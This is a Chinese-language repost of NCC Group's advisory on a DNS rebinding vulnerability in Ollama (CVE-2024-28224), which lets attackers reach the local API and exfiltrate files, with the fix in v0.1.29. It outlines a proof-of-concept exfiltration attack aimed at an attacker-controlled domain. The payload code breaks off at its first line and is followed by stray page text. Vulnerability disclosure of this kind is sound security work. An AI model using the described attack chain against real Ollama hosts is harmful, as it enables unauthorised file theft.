Ollama DNS 重新绑定攻击 (CVE-2024-28224)

概括:

Ollama 是一个用于运行和管理大型语言模型 (LLM) 的开源系统。

NCC 集团发现 Ollama 中存在一个 DNS 重绑定漏洞,该漏洞允许攻击者在未经授权的情况下访问其 API,并执行各种恶意活动,例如从易受攻击的系统中窃取敏感文件数据。

Ollama 在版本 v0.1.29 中修复了此问题。Ollama 用户应更新至此版本或更高版本。

影响:

Ollama DNS 重新绑定漏洞允许攻击者远程完全访问 Ollama API,即使易受攻击的系统未配置为公开其 API。访问 API 允许攻击者窃取运行 Ollama 的系统上的文件数据。攻击者可以执行其他未经授权的活动,例如与 LLM 模型聊天、删除这些模型以及通过资源耗尽引发拒绝服务攻击。一旦连接到恶意 Web 服务器,DNS 重新绑定最快可在 3 秒内完成。

细节:

Ollama 容易受到DNS 重新绑定攻击,这种攻击可被用来绕过浏览器同源策略(SOP)。攻击者可以与 Ollama 服务进行交互,并在用户台式机或服务器上调用其 API。

攻击者必须引导在计算机上运行 Ollama 的 Ollama 用户通过常规或无头 Web 浏览器(例如,在服务器端 Web 抓取应用程序的上下文中)连接到恶意 Web 服务器。恶意 Web 服务器执行 DNS 重新绑定攻击,以迫使 Web 浏览器代表攻击者与易受攻击的 Ollama 实例和 API 进行交互。

Ollama API 允许管理和运行本地模型。它的几个 API 可以访问文件系统,并且可以从远程存储库拉取/检索数据。一旦 DNS 重新绑定攻击成功,攻击者就可以对这些 API 进行排序,以读取 Ollama 运行的进程可访问的任意文件数据,并将这些数据泄露到攻击者控制的系统中。

NCC Group 使用以下步骤成功实施了概念验证数据泄露攻击:

部署 NCC Group 的Singularity of Origin DNS 重新绑定应用程序,其中包括配置“恶意主机”和执行 DNS 重新绑定攻击的组件。

一旦实现 DNS 重新绑定,Singularity 就需要开发攻击负载来利用 Ollama 等特定应用程序。下面提供了一个用 JavaScript 编写的概念验证负载。EXFILTRATION_URL必须将变量配置为指向攻击者拥有的域(例如),以便attacker.com从易受攻击的主机发送窃取的数据。

/**
这是从运行 Ollama 的主机中窃取文件的示例有效负载
**/ 

const OllamaLLama2ExfilData = () =>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值